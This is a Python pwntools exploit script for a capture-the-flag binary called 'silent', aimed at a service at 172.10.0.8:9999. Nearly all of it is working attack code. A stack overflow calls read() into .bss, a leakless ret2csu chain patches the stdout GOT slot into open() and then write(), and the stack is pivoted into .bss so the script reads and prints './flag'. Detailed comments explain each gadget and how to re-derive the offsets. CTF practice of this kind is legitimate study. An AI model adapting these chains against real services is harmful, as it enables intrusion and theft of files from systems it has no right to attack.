import struct
import sys

from pwn import *
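# --- target setup ---------------------------------------------------------
# Exploit PoC for the `silent` CTF binary: every address/offset below is tied
# to this exact binary and the shipped ./libc.so.6; nothing is leaked at
# runtime, so a different build of either breaks the chain silently.
context.log_level = 'debug'   # dump every byte on the tube; blind chains are hard to debug otherwise
context.arch = 'amd64'        # word size for p64()

# libc is only consulted for symbol *deltas* (open/write relative to stdout),
# never for absolute addresses, so no leak is required.
libc = ELF('./libc.so.6')
elf = ELF('./silent')

# 1 -> attack the remote service, 0 -> run the binary locally for debugging.
flag = 1
if flag:
    p = remote('172.10.0.8', 9999)
else:
    # Spawn the same file the ELF object was loaded from instead of a bare
    # "silent", which would depend on PATH resolution rather than the cwd.
    p = process(elf.path)

# Thin aliases over the tube (kept for interactive use even where unused).
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
leak = lambda name, addr: log.success(name + "--->" + hex(addr))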
# --- fixed addresses in the non-PIE `silent` image ------------------------
# The binary is mapped at 0x400000 with fixed .got/.bss, which is why the
# whole chain works without a single leak.  Re-derive all of these for any
# other build (gadget offsets are not stable across compiler versions).

# Tail of __libc_csu_init split into the two classic ret2csu halves.
# Judging by how ret2csu() fills r13/r14/r15, the front half is presumably
#   mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]; ...
# and the behind half (0x1a bytes later) is
#   pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# -- confirm in a disassembler before reusing.
ret2csu_front = 0x400940
ret2csu_behind = 0x40095A

# Presumably `add dword [rbp-0x3d], ebx; ret` (the __do_global_dtors_aux
# gadget): the +0x3d that set_vuln() adds to its target cancels that
# displacement.  Note it only touches the low 32 bits of the slot.
magic_gadget = 0x4007E8

# GOT slot that holds the pointer to libc's _IO_2_1_stdout_.  The chain
# rewrites this slot into open() and later write() by adding libc-relative
# deltas, then calls through it.
stdout_got = 0x601020

# Writable, fixed-address scratch area: pivot target, "./flag" path string,
# and (at bss+0x500) the buffer the flag is read into.
bss = 0x602000
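def set_offset(target, raw, width=32):
    """Return the unsigned ``width``-bit delta that turns ``raw`` into ``target``.

    This is the value popped into rbx for the add gadget: adding it to the
    current slot contents modulo ``2**width`` yields ``target``.  Negative
    deltas wrap to their two's-complement form, e.g.
    ``set_offset(0x10, 0x20) == 0xfffffff0``.

    NOTE: a 32-bit memory add only rewrites the low dword of the 8-byte
    pointer and never carries into the upper half, so ``target`` and ``raw``
    must share their upper 32 bits.  That holds for two symbols inside the
    same libc mapping, which is the only way this script uses it.

    Args:
        target: address the slot should end up holding.
        raw: address the slot currently holds.
        width: bit width of the add the gadget performs (32 for the usual
            ``add [rbp-0x3d], ebx``).

    Returns:
        int in ``range(2**width)``.
    """
    # Masking is the general form of "add 2**32 once if negative": identical
    # for |delta| < 2**width and still correct for larger magnitudes.
    return (target - raw) & ((1 << width) - 1)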
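def set_vuln(offset, target, disp=0x3d, *, csu_pop=None, add_gadget=None):
    """Build a chain that adds ``offset`` into the qword at ``target``.

    Used to retarget a GOT slot without any leak: the delta goes into rbx and
    ``target + disp`` into rbp, then the add gadget runs -- presumably
    ``add dword [rbp-disp], ebx; ret``, so only the low 32 bits of the slot
    change (see set_offset()).  Execution continues at whatever follows the
    returned bytes on the stack.

    Layout, one little-endian qword each:
        csu_pop        pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
        offset         -> rbx (ebx is what the add consumes)
        target + disp  -> rbp, so [rbp - disp] is the slot
        0 x4           -> r12..r15, don't care
        add_gadget     performs the add and returns

    Args:
        offset: unsigned delta from set_offset().
        target: address of the 8-byte slot to patch (a GOT entry here).
        disp: rbp displacement used by the add gadget (0x3d for the usual
            __do_global_dtors_aux gadget).
        csu_pop: address of the six-pop gadget; defaults to the module-level
            ``ret2csu_behind``.
        add_gadget: address of the add gadget; defaults to ``magic_gadget``.

    Returns:
        bytes, exactly 8 qwords (64 bytes).
    """
    if csu_pop is None:
        csu_pop = ret2csu_behind
    if add_gadget is None:
        add_gadget = magic_gadget
    return struct.pack(
        '<8Q',
        csu_pop,
        offset,
        target + disp,
        0, 0, 0, 0,
        add_gadget,
    )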
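def ret2csu(rdi, rsi, rdx, vuln, *, csu_pop=None, csu_call=None):
    """Build a ret2csu chain that calls ``[vuln](rdi, rsi, rdx)``.

    ``vuln`` is the address of a slot *holding* the function pointer (a GOT
    entry), not the function itself: the csu loop does ``call [r12+rbx*8]``.
    Execution continues at whatever follows the returned bytes on the stack.

    Layout, one little-endian qword each:
        csu_pop        pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
        0, 1           rbx=0, rbp=1 -> the loop exits after a single call
        vuln           -> r12, the pointer slot
        rdi, rsi, rdx  -> r13, r14, r15 (presumably moved to edi/rsi/rdx by
                          the call gadget; verify the register order for
                          any other build)
        csu_call       mov/call gadget; after the call it falls into
                       add rsp,8 + six pops, consumed by the seven zeros
        0 x7

    Args:
        rdi, rsi, rdx: the three arguments; rdi must fit in 32 bits because
            the csu gadget loads ``edi``, not ``rdi`` (fine for the fixed
            non-PIE addresses used here).
        vuln: address of the pointer slot to call through.
        csu_pop: address of the six-pop gadget; defaults to ``ret2csu_behind``.
        csu_call: address of the mov/call gadget; defaults to ``ret2csu_front``.

    Returns:
        bytes, exactly 15 qwords (120 bytes).

    Raises:
        ValueError: if ``rdi`` does not fit in 32 bits.
    """
    if csu_pop is None:
        csu_pop = ret2csu_behind
    if csu_call is None:
        csu_call = ret2csu_front
    if not 0 <= rdi < (1 << 32):
        raise ValueError("rdi=%#x does not fit in 32 bits; the csu gadget loads edi" % rdi)
    return struct.pack(
        '<15Q',
        csu_pop,
        0, 1,
        vuln,
        rdi, rsi, rdx,
        csu_call,
        0, 0, 0, 0, 0, 0, 0,
    )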
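def _send_padded(payload, size):
    """Send ``payload`` zero-padded to exactly ``size`` bytes.

    ``ljust`` never truncates, so a chain that outgrew the read() it is meant
    to fill would be cut short by the target and fail far from here -- raise
    instead.
    """
    if len(payload) > size:
        raise ValueError("payload is %#x bytes but the read only takes %#x" % (len(payload), size))
    sd(payload.ljust(size, b'\x00'))


# --- stage 1: overflow -> read(0, bss, 0x300) -> second overflow ------------
# 0x48 bytes reach the saved return address (a 0x40 buffer plus saved rbp,
# matching stage 3).  read is called through its GOT slot, which is already
# resolved because our input was presumably read with it.  0x400878 is then
# returned into, presumably re-entering the function with the overflowing
# read, so stage 3 can overflow again once bss is populated.  0x100 is the
# size that read presumably accepts from us.
payload1 = b'a' * 0x48 + ret2csu(0, bss, 0x300, elf.got['read']) + p64(0x400878)
_send_padded(payload1, 0x100)

# --- stage 2: the chain that stage 1 stores at bss ---------------------------
# bss+0x00  "./flag\0\0"   path for open(); also the qword the pivot pops into rbp
# bss+0x08  chain, executed once rsp lands at bss+8:
#   set_vuln  stdout GOT: &_IO_2_1_stdout_ -> open   (delta from libc symbols)
#   ret2csu   open("./flag", 0, 0)  -> fd 3, assuming only 0-2 are open
#   ret2csu   read(3, bss+0x500, 0x40)  -> caps the flag at 0x40 bytes
#   set_vuln  stdout GOT: open -> write
#   ret2csu   write(1, bss+0x500, 0x40)
# Only libc-relative deltas are used, so no leak is needed, but ./libc.so.6
# must be the exact build running on the target.
payload2 = b'./flag\x00\x00'
payload2 += set_vuln(set_offset(libc.sym['open'], libc.sym['_IO_2_1_stdout_']), stdout_got)
payload2 += ret2csu(bss, 0, 0, stdout_got)
payload2 += ret2csu(3, bss + 0x500, 0x40, elf.got['read'])
payload2 += set_vuln(set_offset(libc.sym['write'], libc.sym['open']), stdout_got)
payload2 += ret2csu(1, bss + 0x500, 0x40, stdout_got)
_send_padded(payload2, 0x300)   # exactly what the stage-1 read asked for

# --- stage 3: pivot into bss -------------------------------------------------
# Saved rbp := bss, return into 0x400876 (presumably `leave; ret`): rsp becomes
# bss+8, so the chain above runs while "./flag" stays intact at bss.
payload3 = b'a' * 0x40 + p64(bss) + p64(0x400876)
_send_padded(payload3, 0x100)
p.interactive()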